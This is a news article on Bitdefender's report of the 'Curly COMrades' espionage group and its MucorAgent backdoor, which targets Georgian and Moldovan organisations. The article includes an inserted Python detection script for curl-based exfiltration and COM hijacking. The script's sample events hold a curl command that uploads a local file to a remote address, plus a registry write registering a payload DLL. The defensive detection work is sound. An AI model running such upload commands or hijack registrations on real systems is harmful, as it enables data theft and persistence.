Experts warn criminals are using backdoor malware to target governments
Curly COMrades are targeting Moldova and Georgia

- Bitdefender finds new piece of malware in the wild
- It attributed it to a brand-new cyber-espionage group
- The researchers believe the group is Russian
Cybersecurity researchers at Bitdefender recently spotted a new threat actor using a never-before-seen piece of backdoor malware to target critical infrastructure organizations in eastern Europe.
Bitdefender named the new group Curly COMrades, since it heavily relies on the curl.exe tool to pull data and communicate with the C2 server, and since it hijacks Component Object Model (COM) objects during its attacks.
In its attacks, Curly COMrades deploy a backdoor named MucorAgent, a custom three-stage malware component, “engineered as a .NET stealthy tool capable of executing an AES-encrypted PowerShell script and uploading the resulting output to a designated server.”
When in doubt - blame the Russians
In other words, it’s a piece of Windows malware that runs hidden commands, keeps them encrypted to avoid detection, and sends the results back to the attacker.
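As an added example (not Bitdefender's code and not telemetry from this campaign), the following Python triage walks constructed Sysmon-style events and flags the two behaviours the article names: curl.exe launched by a script host or with data-sending options, and a per-user CLSID server registration, which is the registry form COM hijacking usually takes (an assumption; the article does not describe the exact variant). The simplified event format, the sample paths, CLSIDs and the documentation-range address are all constructed.

```python
import re

# Constructed sample events in a simplified "key=value; key=value" form
# (assumption: not real Sysmon XML and not telemetry from this campaign).
SAMPLE_EVENTS = [
    "EventID=1; Image=C:\\Windows\\System32\\curl.exe; ParentImage=C:\\Windows\\System32\\wscript.exe; "
    "CommandLine=curl.exe -s -T C:\\Users\\Public\\out.txt http://198.51.100.7/u",
    "EventID=1; Image=C:\\Program Files\\Git\\mingw64\\bin\\curl.exe; ParentImage=C:\\Windows\\System32\\cmd.exe; "
    "CommandLine=curl.exe -O https://example.org/readme.txt",
    "EventID=13; Image=C:\\Windows\\System32\\rundll32.exe; TargetObject=HKU\\S-1-5-21-1000\\Software\\Classes"
    "\\CLSID\\{00000000-0000-0000-0000-000000000001}\\InprocServer32\\(Default); Details=C:\\Users\\Public\\payload.dll",
    "EventID=13; Image=C:\\Windows\\System32\\msiexec.exe; TargetObject=HKLM\\SOFTWARE\\Classes"
    "\\CLSID\\{00000000-0000-0000-0000-000000000002}\\InprocServer32\\(Default); Details=C:\\Program Files\\Vendor\\app.dll",
]

# curl options that send local data to a remote host (file upload or request body).
UPLOAD_FLAGS = re.compile(r"(^|\s)(-T|--upload-file|-d|--data(-binary|-raw|-urlencode)?|-F|--form)(\s|$)")
# Script hosts and LOLBins that rarely have a legitimate reason to spawn curl.exe.
SCRIPT_PARENTS = {"wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Per-user CLSID server registration: an HKCU entry shadows the HKLM one, the classic COM hijack.
COM_HIJACK = re.compile(
    r"^HKU\\[^\\]+\\Software\\Classes\\CLSID\\\{[0-9A-Fa-f-]+\}\\(InprocServer32|LocalServer32)", re.I)


def parse_event(line: str) -> dict:
    # Split a "key=value; key=value" line into a dict; only the first "=" separates key from value.
    fields = {}
    for part in line.split("; "):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def triage_events(lines: list) -> list:
    # Return one finding per event matching the curl-for-C2 or COM-hijack heuristics.
    findings = []
    for line in lines:
        ev = parse_event(line)
        image = ev.get("Image", "").lower()
        if ev.get("EventID") == "1" and image.endswith("\\curl.exe"):
            parent = ev.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
            cmd = ev.get("CommandLine", "")
            reasons = []
            if UPLOAD_FLAGS.search(cmd):
                reasons.append("curl upload/data flag")
            if parent in SCRIPT_PARENTS:
                reasons.append(f"curl spawned by {parent}")
            if reasons:  # a plain curl download from cmd.exe is common and is not flagged
                findings.append({"rule": "curl-c2", "detail": "; ".join(reasons), "evidence": cmd})
        elif ev.get("EventID") == "13" and COM_HIJACK.search(ev.get("TargetObject", "")):
            findings.append({"rule": "com-hijack", "detail": "per-user CLSID server override",
                             "evidence": ev.get("Details", "")})
    return findings
```

Running `triage_events(SAMPLE_EVENTS)` yields two findings (the scripted curl upload and the HKU CLSID write) and ignores the benign download and the machine-wide vendor registration.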
So far, identified victims include government and judicial organizations in Georgia, and energy companies in Moldova.
Given the targets, the researchers believe the attackers are of Russian origin, or at least Russia-aligned.
However, they did stress that there are no strong overlaps with known Russian APT groups, but Curly COMrades’ operations “align with the geopolitical goals of the Russian Federation.”
Bitdefender also could not determine the initial access vector - how crooks managed to infiltrate the target endpoints to deploy MucorAgent to begin with.
They claim to have seen installations of multiple proxy agents, including Resocks, which they suspect may have been used to that end.
Ever since Russia’s attention turned towards Ukraine in 2014 with the annexation of Crimea, countries on its eastern border have lost the spotlight. Georgia, however, is in a similar position to Ukraine, with two regions declaring independence with the help of the Russian military - South Ossetia, and Abkhazia. Therefore, it would make sense that Russia’s cyberspies would like to keep tabs on neighboring countries and their diplomatic efforts.
Via BleepingComputer
Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.